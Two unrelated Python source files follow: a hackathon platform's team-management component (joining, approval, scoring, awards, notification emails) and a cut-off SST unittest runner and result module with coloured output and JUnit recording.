from hackathon.constants import TEAM_MEMBER_STATUS, TEAM_SHOW_TYPE, HACK_USER_TYPE, HACKATHON_CONFIG
__all__ = ["TeamManager"]
hack_manager = RequiredFeature("hackathon_manager")
class TeamManager(Component):
"""Component to manage hackathon teams"""
user_manager = RequiredFeature("user_manager")
admin_manager = RequiredFeature("admin_manager")
register_manager = RequiredFeature("register_manager")
hackathon_template_manager = RequiredFeature("hackathon_template_manager")
def get_team_by_id(self, team_id):
team = self.__get_team_by_id(team_id)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
# TODO: refine: dereference member users is not necessary
return self.__team_detail(team, user)
else:
return not_found()
def get_my_current_team(self, hackathon, user):
team = self.__get_valid_team_by_user(user.id, hackathon.id)
return self.__team_detail(team, user) if team else not_found("user has no team",
friendly_message="组队异常,请联系管理员!")
def get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team_name: str | unicode
:param team_name: name of the team
:rtype: dict
:return: team's information as a dict if team is found otherwise not_found()
"""
team = self.__get_team_by_name(hackathon_id, team_name)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
return self.__team_detail(team, user)
else:
return not_found("no such team")
def get_team_members(self, team_id):
"""Get team member list of specific team
:rtype: dict
:return: team's information and team's members list if team is found otherwise not_found()
"""
try:
team = Team.objects(id=team_id).first()
except ValidationError:
return None
if not team:
return None
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
return [sub(t) for t in team.members]
def get_hackathon_team_list(self, hackathon_id, name=None, number=None):
"""Get the team list of selected hackathon
:type hackathon_id: string or object_id
:param hackathon_id: hackathon id
:type name: str|unicode
:param name: name of team. optional
:type number: int
:param number: querying condition, return number of teams
:rtype: list
:return: a list of team filter by name and number on selected hackathon
"""
query = Q(hackathon=hackathon_id)
if name is not None:
query &= Q(name__icontains=name)
try:
teams = Team.objects(query).order_by('name')[:number]
except ValidationError:
return []
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
def get_team(team):
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
teamDic['works'] = teamDic.get('works', '')
[teamDic.pop(key, None) for key in
['assets', 'azure_keys', 'scores', 'templates', 'hackathon']]
teamDic["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
teamDic["members"] = [sub(t) for t in team.members]
return teamDic
return [get_team(x) for x in teams]
def create_default_team(self, hackathon, user):
"""Create a default new team for user after registration.
Use user name as team name by default. Append user id in case user name is duplicate
"""
user_team = self.__get_valid_team_by_user(user.id, hackathon.id)
if user_team:
self.log.debug("fail to create team since user is already in some team.")
return precondition_failed("you must leave the current team first")
team_name = self.__generate_team_name(hackathon, user)
team_member = TeamMember(join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.APPROVED,
user=user)
team = Team(name=team_name,
leader=user,
logo=user.avatar_url,
hackathon=hackathon,
members=[team_member])
team.save()
return team.dic()
def update_team(self, kwargs):
"""Update existing team information
:type kwargs: dict
:param kwargs: a dict to store update information for team
:rtype: dict
:return: updated team information in a dict
"""
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
# avoid duplicate team with same names
if "name" in kwargs and kwargs["name"] != team.name:
if self.__get_team_by_name(g.hackathon.id, kwargs["name"]):
return precondition_failed("team with the same name exists already")
self.__validate_team_permission(g.hackathon.id, team, g.user)
# hackathon.modify(**update_items)
# team.name = kwargs.get("name", team.name)
# team.description = kwargs.get("description", team.description)
# team.logo = kwargs.get("logo", team.logo)
kwargs.pop('id', None) # id should not be included
team.modify(**kwargs)
team.update_time = self.util.get_now()
team.save()
if "dev_plan" in kwargs and kwargs["dev_plan"] and not kwargs["dev_plan"] == "" \
and team.hackathon.config.get(HACKATHON_CONFIG.DEV_PLAN_REQUIRED, False):
t = threading.Thread(target=self.__email_notify_dev_plan_submitted, args=(team,))
t.setDaemon(True)
t.start()
return self.__team_detail(team)
def dismiss_team(self, operator, team_id):
"""Dismiss a team by team leader or hackathon admin
:rtype: bool
:return: if dismiss success, return ok. if not ,return bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return ok()
hackathon = team.hackathon
self.__validate_team_permission(hackathon.id, team, operator)
members = team.members
member_users = [m.user for m in members]
# TODO: transcation?
team.delete()
for u in member_users:
self.create_default_team(hackathon, u)
return ok()
def quit_team_forcedly(self, team, user):
"""
The operator(admin or superadmin) forces a user(team leader or other members) to quit a team.
If the user is the only member of the team, the team will be deleted.
Else if the user is the leader of a team with several members, the team will be decomposed into several
new teams.
Else if the user is not the leader of a team with several members, just the user quits the team.
:rtype: bool
:return: if dismiss success, return ok. if not ,return bad request.
"""
# here we don't check whether the operator has the permission,
if not team.members or len(team.members) == 0:
self.log.warn("this team doesn't have any members")
return ok()
member_users = [m.user for m in team.members if m.status == TEAM_MEMBER_STATUS.APPROVED]
num_team_members = len(member_users)
hackathon = team.hackathon
if num_team_members > 1:
if team.leader == user:
team.delete()
for u in member_users:
if u.id != user.id:
self.create_default_team(hackathon, u)
else:
Team.objects(id=team.id).update_one(pull__members__user=user)
else:
# num_team_members == 1
team.delete()
return ok()
def join_team(self, user, team_id):
"""Join a team will create a record on user_team_rel table which status will be 0.
:type user: User
:rtype: dict
:return: if user already joined team or team not exist, return bad request. Else, return a dict of joined
details.
"""
if Team.objects(id=team_id, members__user=user.id).count():
return ok("You already joined this team.")
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
cur_team = self.__get_valid_team_by_user(user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
if not self.register_manager.is_user_registered(user.id, team.hackathon):
return precondition_failed("user not registerd")
mem = TeamMember(
join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.INIT,
user=user)
team.members.append(mem)
team.save()
return to_dic(mem)
def update_team_member_status(self, operator, team_id, user_id, status):
""" update user's status on selected team. if current user doesn't have permission, return bad request.
Else, update user's status
:type status: int
:param status: the status of the team member, see TEAM_MEMBER_STATUS in constants.py
:rtype: bool
:return: if update success, return ok. if not , return bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
mem = filter(lambda x: str(x.user.id) == user_id, team.members)
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
# #NOTE1# we have to re-check this here
# because of this situation:
# A is in a single-person team TeamA, and request join TeamB
# after that, C join TeamA and now TeamA has two members,
# this is not allowed when status == TEAM_MEMBER_STATUS.APPROVED
cur_team = self.__get_valid_team_by_user(mem.user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
self.__validate_team_permission(team.hackathon.id, team, operator)
if mem.user.id == team.leader.id:
return precondition_failed("cannot update status of team leader")
if status == TEAM_MEMBER_STATUS.APPROVED:
# disable previous team first
# NOTE:
# Do we also have to delete status that is not TEAM_MEMBER_STATUS.APPROVED?
# i.e., if A request join both TeamB and TeamC, TeamC approve join first, then TeamB approved,
# this will cause A leave TeamB and join TeamC.
# is this the desired behaviour?
Team.objects(hackathon=team.hackathon.id).update(__raw__={
"$pull": {
"members": {
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}}})
# because only team leader with single team can make join request
# so we don't have to make default team for other members in this team
# we make the check in #NOTE1# so this is always true
Team.objects(hackathon=team.hackathon.id, leader=mem.user.id).delete()
mem.status = TEAM_MEMBER_STATUS.APPROVED
mem.update_time = self.util.get_now()
team.save()
return ok("approved")
if status == TEAM_MEMBER_STATUS.DENIED:
user = mem.user
hackathon = team.hackathon
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok("Your request has been denied, please rejoin another team.")
def kick_or_leave(self, operator, team_id, user_id):
try:
team = Team.objects(id=team_id, members__user=user_id).first()
except ValidationError:
return not_found()
if not team:
return not_found()
mem = filter(lambda x: str(x.user.id) == user_id, team.members)
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
hackathon = team.hackathon
user = mem.user
if str(team.leader.id) == user_id: # if the user to be leaved or kicked is team leader
return precondition_failed("leader cannot leave team")
if str(operator.id) == user_id: # leave team
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
else: # kick somebody else
self.__validate_team_permission(hackathon.id, team, operator)
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok()
def add_template_for_team(self, args):
"""Add template to team of the current user by template name
template_id must be included in args. Current login user must have a team and HE must be its leader
"""
if "template_id" not in args:
return bad_request("template id invalid")
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.add_template_to_hackathon(args["template_id"])
def delete_template_from_team(self, template_id):
"""Delete template from current user's team
Team should exist and current login user must be the leader
"""
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.delete_template_from_hackathon(template_id)
def get_team_by_user_and_hackathon(self, user, hackathon):
team = Team.objects(hackathon=hackathon, members__user=user).first()
return team
def score_team(self, judge, ctx):
team = self.__get_team_by_id(ctx.team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, judge.id):
return forbidden()
score = filter(lambda x: x.judge.id == judge.id, team.scores)
assert len(score) < 2
if score:
score = score[0]
score.score = ctx.score
score.reason = ctx.get("reason")
score.update_time = self.util.get_now()
else:
score = TeamScore(
score=ctx.score,
judge=judge,
reason=ctx.get("reason"))
team.scores.append(score)
team.save()
return self.__response_get_score(judge, team.scores)
def get_score(self, user, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id):
return {}
return self.__response_get_score(user, team.scores)
def __response_get_score(self, user, scores):
resp = {
"all": [to_dic(s) for s in scores]}
my = filter(lambda sc: sc.judge.id == user.id, scores)
assert len(my) < 2
if my:
resp["my"] = to_dic(my[0])
return resp
def add_team_show(self, user, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found()
self.__validate_team_permission(team.hackathon.id, team, user)
try:
work = TeamWork(
id=uuid.uuid1(),
description=context.get("note"),
type=context.type,
uri=context.uri)
team.works.append(work)
team.save()
except ValidationError as e:
if "uri" in e.message:
return bad_request("`uri` field must be in uri format")
else:
raise e
return to_dic(work)
def delete_team_show(self, user, show_id):
try:
team = Team.objects(works__id=show_id).first()
except (ValidationError, ValueError):
return not_found("wrong id format")
if team:
self.__validate_team_permission(team.hackathon.id, team, user)
for i in xrange(len(team.works)):
if str(team.works[i].id) == show_id:
team.works.pop(i)
team.save()
break
return ok()
def get_team_show_list(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
return [to_dic(s) for s in team.works]
def get_hackathon_show_list(self, hackathon_id, show_type=None, limit=6):
query = Q(hackathon=hackathon_id)
if show_type is not None:
query &= Q(works__type=int(show_type))
works = []
for team in Team.objects(query).filter(works__1__exists=True).order_by('update_time', '-age')[:limit]:
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
[teamDic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
#
# teamDic['works'] = []
#
# for work in team.works:
# teamDic['works'].append(to_dic(work))
works.append(teamDic)
# works.sort(lambda a, b: int(b["create_time"] - a["create_time"]))
# def proc_work(w):
# w.pop("create_time")
# w["id"] = str(w["id"])
# w["team_id"] = str(w["team_id"])
# w["hackathon_id"] = str(w["hackathon_id"])
# return w
return works
def get_team_show_list_by_user(self, user_id):
teams = Team.objects(members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).all()
def get_team_show_detail(team):
dic = self.__team_detail(team)
dic["hackathon"] = team.hackathon.dic()
return dic
return [get_team_show_detail(team) for team in teams if not len(team.works) == 0]
def get_team_source_code(self, team_id):
try:
team = Team.objects(id=team_id, works__type=TEAM_SHOW_TYPE.SOURCE_CODE)
except ValidationError:
return None
if not team:
return None
return filter(lambda w: w.type == TEAM_SHOW_TYPE.SOURCE_CODE, team.works)[0]
def query_team_awards(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
awards = [self.__award_with_detail(r, hackathon=team.hackathon) for r in team.awards]
awards.sort(lambda a, b: b.level - a.level)
return awards
def get_granted_awards(self, hackathon):
awards = []
team_id_with_awards = []
for team in Team.objects(hackathon=hackathon):
awards += team.awards
if not len(team.awards) == 0:
team_id_with_awards.append(team.id)
awards = [self.__award_with_detail(r) for r in awards]
awards.sort(lambda a, b: b["level"] - a["level"])
# find teams who are granted these awards
for award in awards:
award["team"] = []
for team_id in team_id_with_awards:
team = Team.objects(id=team_id).first()
if uuid.UUID(award["id"]) in team.awards:
award["team"].append(team.dic())
# len(awards) is equal to the number of all awards granted, so it's duplicated, remove duplicated items in JS.
return awards
def get_all_granted_awards(self, limit):
teams = Team.objects().all()
teams_with_awards = [team for team in teams if not team.awards == []]
teams_with_awards.sort(key=lambda t: (
t.hackathon.id,
Hackathon.objects(id=t.hackathon.id, awards__id=t.awards[0]).first().awards.get(id=t.awards[0]).level
), reverse=True) # sort by hackathon and then sort by award level.
teams_with_awards = teams_with_awards[0: int(limit)]
return [self.__get_hackathon_and_show_detail(team) for team in teams_with_awards]
def grant_award_to_team(self, hackathon, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found("team not found")
award = filter(lambda a: str(a.id) == context.award_id, hackathon.awards)
assert len(award) < 2
if not award:
return not_found("award not found")
award = award[0]
if team.hackathon.id != hackathon.id:
return precondition_failed("hackathon doesn't match")
team_award = filter(lambda a: str(a) == context.award_id, team.awards)
assert len(team_award) < 2
if not team_award:
team.awards.append(uuid.UUID(context.award_id))
team.save()
return self.__award_with_detail(context.award_id)
def cancel_team_award(self, hackathon, team_id, award_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
for award in team.awards:
if str(award) == award_id:
team.awards.remove(award)
team.save()
break
return ok()
def send_email_azure(self, kwargs):
# team information
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
azure = team.azure
if not azure.strip():
if Azure.objects(status="0").count() == 0:
return ok("请联系管理员.")
azure_info = Azure.objects(status="0").first()
else:
azure_info = Azure.objects(account=azure).first()
if not azure_info:
return ok("请联系管理员!")
primary_emails = []
for i in xrange(0, len(team.members)):
mem = team.members[i]
resp = self.user_manager.user_display_info(mem.user)
primary_emails.append(resp['emails'][0]['email'])
Azure.objects(account=azure_info.account).update_one(status="1")
Team.objects(id=team.id).update_one(azure=azure_info.account)
sender = ''
email_title = ''
email_content = ''
return self.util.send_emails(sender, primary_emails, email_title, email_content)
def __init__(self):
pass
def __award_with_detail(self, team_award, hackathon=None):
if not hackathon:
hackathon = g.hackathon
try:
award = filter(lambda a: str(a.id) == str(team_award), hackathon.awards)[0]
except IndexError:
return None
return to_dic(award)
def __team_detail(self, team, user=None):
resp = team.dic()
resp["leader"] = self.user_manager.user_display_info(team.leader)
resp["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
# all team action not allowed if frozen
resp["is_frozen"] = False
for i in xrange(0, len(team.members)):
mem = team.members[i]
resp["members"][i]["user"] = self.user_manager.user_display_info(mem.user)
if user:
resp["is_admin"] = self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id)
resp["is_leader"] = team.leader == user
rel = team.members.filter(user=user)
resp["is_member"] = True if not rel == [] else False
return resp
def __generate_team_name(self, hackathon, user):
"""Generate a default team name by user name. It can be updated later by team leader"""
team_name = user.name
if Team.objects(hackathon=hackathon, name=team_name).first():
team_name = "%s (%s)" % (user.name, user.id)
return team_name
def __get_user_teams(self, user_id):
"""Get all teams of specific and related hackathon display info
:type user_id: int
:param user_id: User id to get teams. Cannot be None
:rtype: list
:return list of all teams as well as hackathon info
"""
return Team.objects(members__user=user_id).all()
def __get_team_by_id(self, team_id):
"""Get team by its primary key"""
try:
return Team.objects(id=team_id).first()
except ValidationError:
return None
def __get_valid_team_by_user(self, user_id, hackathon_id):
"""Get valid Team(Mongo-document) by user and hackathon
"valid" means user is approved. There might be other records where status=Init
Since foreign keys are defined in Team, one can access team or user through the return result directly
:rtype: Team
:return instance of Team
"""
return Team.objects(
hackathon=hackathon_id,
members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).first()
def __get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: hackathon id for the team
:type team_name: str|unicode
:param team_name: name of the team
:rtype: Team
:return: instance of Team if team found otherwise None
"""
try:
return Team.objects(hackathon=hackathon_id, name=team_name).first()
except ValidationError:
return None
def __validate_team_permission(self, hackathon_id, team, user):
"""Validate current login user whether has proper right on specific team.
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team: Team
:param team: team to be checked
:type user: User
:param user: current login user
:raise: Forbidden if user is neither team leader, hackathon admin nor super admin
"""
self.log.debug(
"validate team permission on hackathon %s and team %s for user %s" % (hackathon_id, team.name, user.id))
# check if team leader
if team.leader.id != user.id:
# check if hackathon admin
if not self.admin_manager.is_hackathon_admin(hackathon_id, user.id):
# super permission is already checked in admin_manager.is_hackathon_admin
self.log.debug("Access denied for user [%s]%s trying to access team '%s' of hackathon %s " %
(user.id, user.name, team, hackathon_id))
raise Forbidden(description="You don't have permission on team '%s'" % team.name)
return
def __get_hackathon_and_show_detail(self, team):
team_dic = team.dic()
team_dic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
team_dic['cover'] = team_dic.get('cover', '')
team_dic['project_name'] = team_dic.get('project_name', '')
team_dic['dev_plan'] = team_dic.get('dev_plan', '')
[team_dic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
team_dic["hackathon"] = hack_manager.get_hackathon_detail(team.hackathon)
return team_dic
def __email_notify_dev_plan_submitted(self, team):
# send emails to all admins of this hackathon when one team dev plan is submitted.
admins = UserHackathon.objects(hackathon=team.hackathon, role=HACK_USER_TYPE.ADMIN).distinct("user")
email_title = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.title", None)
file_name = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.default_file_name", None)
sender = self.util.safe_get_config("email.default_sender", "")
# todo remove receivers_forced
receivers_forced = self.util.safe_get_config("email.receivers_forced", [])
try:
if email_title and file_name:
path = abspath("%s/.." % dirname(realpath(__file__)))
f = open(path + "/resources/email/" + file_name, "r")
email_content = f.read()
email_title = email_title % (team.name.encode("utf-8"))
email_content = email_content.replace("{{team_name}}", team.name.encode("utf-8"))
email_content = email_content.replace("{{team_id}}", str(team.id))
email_content = email_content.replace("{{hackathon_name}}", team.hackathon.name.encode("utf-8"))
f.close()
else:
self.log.error("send email_notification (dev_plan_submitted_event) fails: please check the config")
return False
except Exception as e:
self.log.error(e)
return False
# isNotified: whether at least one admin has been notified by emails.
isNotified = False
for admin in admins:
isSent = False
primary_emails = [email.email for email in admin.emails if email.primary_email]
nonprimary_emails = [email.email for email in admin.emails if not email.primary_email]
# send notification to all primary-mailboxes.
if not len(primary_emails) == 0:
isSent = self.util.send_emails(sender, primary_emails, email_title, email_content)
# if fail to send emails to primary-mailboxes, sent email to one non-primary mailboxes.
if not isSent and not len(nonprimary_emails) == 0:
for nonpri_email in nonprimary_emails:
if self.util.send_emails(sender, [nonpri_email], email_title, email_content):
isSent = True
break
isNotified = isNotified or isSent
# todo remove this code
self.util.send_emails(sender, receivers_forced, email_title, email_content)
self.log.debug(team.name + ": dev_plan email notification result: " + str(isNotified))
return isNotified
|
test_engine_unittest.py
|
# -*- coding: utf-8 -*-
## Copyright 2009-2022 NTESS. Under the terms
## of Contract DE-NA0003525 with NTESS, the U.S.
## Government retains certain rights in this software.
##
## Copyright (c) 2009-2022, NTESS
## All rights reserved.
##
## This file is part of the SST software package. For license
## information, see the LICENSE file in the top level directory of the
## distribution.
""" This module is the derived python unittest and testtools classes to support
the requirements for SST Testing.
"""
import sys
import unittest
import traceback
import threading
import time
from datetime import datetime
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY3_4_Plus = sys.version_info[1] >= 4
################################################################################
def check_module_conditional_import(module_name):
""" Test to see if we can import a module
See: https://stackoverflow.com/questions/14050281/how-to-check-if-a-python-module-exists-without-importing-it
Args:
module_name (str): Module to be imported
Returns:
True if module is loadable
"""
if PY2:
import imp
try:
imp.find_module(module_name)
return True
except ImportError:
return False
else:
import importlib
import importlib.util
if not PY3_4_Plus:
avail = importlib.find_loader(module_name)
return avail is not None
else:
avail = importlib.util.find_spec(module_name)
return avail is not None
################################################################################
# See if we can import some optional modules
blessings_loaded = False
if check_module_conditional_import('blessings'):
import blessings
from blessings import Terminal
blessings_loaded = True
pygments_loaded = False
if check_module_conditional_import('pygments'):
import pygments
from pygments import formatters, highlight
pygments_loaded = True
try:
# Python 2
from pygments.lexers import PythonTracebackLexer as Lexer
except NameError:
# Python 3
from pygments.lexers import Python3TracebackLexer as Lexer
# Queue module changes name between Py2->Py3
if PY3:
import queue
Queue = queue.Queue
else:
import Queue
Queue = Queue.Queue
# Try to import testtools (this may not be installed on system)
if check_module_conditional_import('testtools'):
import testtools
from testtools.testsuite import ConcurrentTestSuite
from testtools.testsuite import iterate_tests
TestSuiteBaseClass = ConcurrentTestSuite
else:
# If testtools not available, just trick the system to use unittest.TestSuite
# This allows us to continue, but not support concurrent testing
TestSuiteBaseClass = unittest.TestSuite
import test_engine_globals
from sst_unittest import *
from sst_unittest_support import *
from test_engine_support import strclass
from test_engine_support import strqual
from test_engine_junit import JUnitTestCase
if testing_check_is_py_2():
text_type = unicode
else:
text_type = str
################################################################################
def verify_concurrent_test_engine_available():
""" Check to see if we can load testtools if the user wants to run
in concurrent mode.
Will generate a Fatal error if system configuration does not support
concurrent testing.
"""
if test_engine_globals.TESTENGINE_CONCURRENTMODE:
if not check_module_conditional_import('testtools'):
errmsg = ("Test Frameworks Cannot Run Concurrently - ") + \
("User must perform 'pip install testtools'")
log_fatal(errmsg)
################################################################################
class SSTTextTestRunner(unittest.TextTestRunner):
""" A superclass to support SST required testing """
if blessings_loaded:
_terminal = Terminal()
colours = {
None: text_type,
'failed': _terminal.bold_red,
'passed': _terminal.green,
'notes': _terminal.bold_yellow,
}
else:
colours = {
None: text_type
}
def __init__(self, stream=sys.stderr, descriptions=True, verbosity=1,
failfast=False, buffer=False, resultclass=None,
no_colour_output=False):
super(SSTTextTestRunner, self).__init__(stream, descriptions, verbosity,
failfast, buffer, resultclass)
if not blessings_loaded or not pygments_loaded:
log_info(("Full colorized output can be obtained by running") +
(" 'pip install blessings pygments'"), forced=False)
if blessings_loaded:
self.no_colour_output = no_colour_output
else:
self.no_colour_output = True
log("\n=== TESTS STARTING " + ("=" * 51))
###
def run(self, test):
""" Run the tests."""
testing_start_time = time.time()
runresults = super(SSTTextTestRunner, self).run(test)
testing_stop_time = time.time()
total_testing_time = testing_stop_time - testing_start_time
self._get_and_display_test_results(runresults, total_testing_time)
return runresults
###
def did_tests_pass(self, run_results):
""" Figure out if testing passed.
Args:
run_results - A unittest.TestResult object
Returns:
True if all tests passing with no errors, false otherwise
"""
return run_results.wasSuccessful and \
len(run_results.failures) == 0 and \
len(run_results.errors) == 0 and \
len(run_results.unexpectedSuccesses) == 0 and \
test_engine_globals.TESTENGINE_ERRORCOUNT == 0
###
def _get_and_display_test_results(self, run_results, total_testing_time):
""" Figure out if testing passed, and display the test results.
Args:
sst_tests_results - A unittest.TestResult object
Returns:
True if all tests passing with no errors, false otherwise
"""
numpassingtests = run_results.testsRun - len(run_results.failures) \
- len(run_results.skipped) \
- len(run_results.errors) \
- len(run_results.expectedFailures) \
- len(run_results.unexpectedSuccesses)
if not self.did_tests_pass(run_results):
log(("\n=== TEST RESULTS BREAKDOWN ========") +
("==================================="))
run_results.get_testsuites_results_dict().log_fail_error_skip_unexpeced_results()
log(("\n=== TEST RESULTS SUMMARY ==========") +
("===================================\n"))
log("Tests Run = {0}".format(run_results.testsRun))
log(40 * "-")
log("Passing = {0}".format(numpassingtests))
log("Failures = {0}".format(len(run_results.failures)))
log("Skipped = {0}".format(len(run_results.skipped)))
log("Errors = {0}".format(len(run_results.errors)))
log("Expected Failures = {0}".format(len(run_results.expectedFailures)))
log("Unexpected Successes = {0}".format(len(run_results.unexpectedSuccesses)))
log("Testing Notes = {0}".format(len(test_engine_globals.TESTENGINE_TESTNOTESLIST)))
log(("-----------------------------------") +
("-----------------------------------"))
t_min, t_sec = divmod(total_testing_time, 60)
t_hr, t_min = divmod(t_min, 60)
log("-- Total Test Time = {0:d} Hours, {1:d} Minutes, {2:2.3f} Seconds --".format(int(t_hr), int(t_min), t_sec))
if self.did_tests_pass(run_results):
if self.no_colour_output:
color_type = None
else:
color_type = 'passed'
log_forced(str(self.colours[color_type]("\n====================")))
log_forced(str(self.colours[color_type]("== TESTING PASSED ==")))
log_forced(str(self.colours[color_type]("====================")))
else:
if self.no_colour_output:
color_type = None
else:
color_type = 'failed'
if test_engine_globals.TESTENGINE_ERRORCOUNT == 0:
log_forced(str(self.colours[color_type]("\n====================")))
log_forced(str(self.colours[color_type]("== TESTING FAILED ==")))
log_forced(str(self.colours[color_type]("====================")))
else:
log_forced(str(self.colours[color_type]("\n==================================")))
log_forced(str(self.colours[color_type]("== TESTING FAILED DUE TO ERRORS ==")))
log_forced(str(self.colours[color_type]("==================================")))
if test_engine_globals.TESTENGINE_TESTNOTESLIST:
if self.no_colour_output:
color_type = None
else:
color_type = 'notes'
log_forced(str(self.colours[color_type](("\n=== TESTING NOTES =================") +
("==================================="))))
for note in test_engine_globals.TESTENGINE_TESTNOTESLIST:
log_forced(str(self.colours[color_type](" - {0}".format(note))))
log(("\n===================================") +
("===================================\n"))
################################################################################
class SSTTextTestResult(unittest.TestResult):
""" A superclass to support SST required testing, this is a modified version
of unittestTextTestResult from python 2.7 modified for SST's needs.
"""
separator1 = '=' * 70
separator2 = '-' * 70
indent = ' ' * 4
_test_class = None
if blessings_loaded:
_terminal = Terminal()
colours = {
None: text_type,
'error': _terminal.bold_yellow,
'expected': _terminal.green,
'fail': _terminal.bold_red,
'skip': _terminal.bold_blue,
'success': _terminal.green,
'title': _terminal.magenta,
'unexpected': _terminal.bold_red,
}
else:
colours = {
None: text_type
}
if pygments_loaded:
formatter = formatters.Terminal256Formatter()
lexer = Lexer()
def __init__(self, stream, descriptions, verbosity, no_colour_output=False):
super(SSTTextTestResult, self).__init__(stream, descriptions, verbosity)
self.testsuitesresultsdict = SSTTestSuitesResultsDict()
self._test_name = "undefined_testname"
self._testcase_name = "undefined_testcasename"
self._testsuite_name = "undefined_testsuitename"
self._junit_test_case = None
self.stream = stream
self.showAll = verbosity > 1
self.dots = verbosity == 1
self.descriptions = descriptions
if blessings_loaded:
self.no_colour_output = no_colour_output
else:
self.no_colour_output = True
def getShortDescription(self, test):
doc_first_line = test.shortDescription()
if self.descriptions and doc_first_line:
return '\n'.join((str(test), doc_first_line))
else:
return str(test)
def getLongDescription(self, test):
doc_first_line = test.shortDescription()
if self.descriptions and doc_first_line:
return '\n'.join((str(test), doc_first_line))
return str(test)
def getClassDescription(self, test):
test_class = test.__class__
doc = test_class.__doc__
if self.descriptions and doc:
return doc.strip().split('\n')[0].strip()
return strclass(test_class)
###
def startTest(self, test):
super(SSTTextTestResult, self).startTest(test)
#log_forced("DEBUG - startTest: Test = {0}\n".format(test))
if self.showAll:
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
if self._test_class != test.__class__:
self._test_class = test.__class__
title = self.getClassDescription(test)
if self.no_colour_output:
self.stream.writeln(self.colours[None](title))
else:
self.stream.writeln(self.colours['title'](title))
self.stream.flush()
self._test_name = "undefined_testname"
_testname = getattr(test, 'testname', None)
if _testname is not None:
self._test_name = test.testname
if self._is_test_of_type_ssttestcase(test):
self._testcase_name = test.get_testcase_name()
self._testsuite_name = test.get_testsuite_name()
else:
self._testcase_name = "FailedTest"
self._testsuite_name = "FailedTest"
timestamp = datetime.utcnow().strftime("%Y_%m%d_%H:%M:%S.%f utc")
self._junit_test_case = JUnitTestCase(self._test_name,
self._testcase_name,
timestamp=timestamp)
def stopTest(self, test):
super(SSTTextTestResult, self).stopTest(test)
#log_forced("DEBUG - stopTest: Test = {0}\n".format(test))
testruntime = 0
if self._is_test_of_type_ssttestcase(test):
testruntime = test.get_test_runtime_sec()
self._junit_test_case.junit_add_elapsed_sec(testruntime)
if not self._is_test_of_type_ssttestcase(test):
return
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
test_engine_globals.TESTRUN_JUNIT_TESTCASE_DICTLISTS['singlethread'].\
append(self._junit_test_case)
else:
test_engine_globals.TESTRUN_JUNIT_TESTCASE_DICTLISTS[self._testsuite_name].\
append(self._junit_test_case)
###
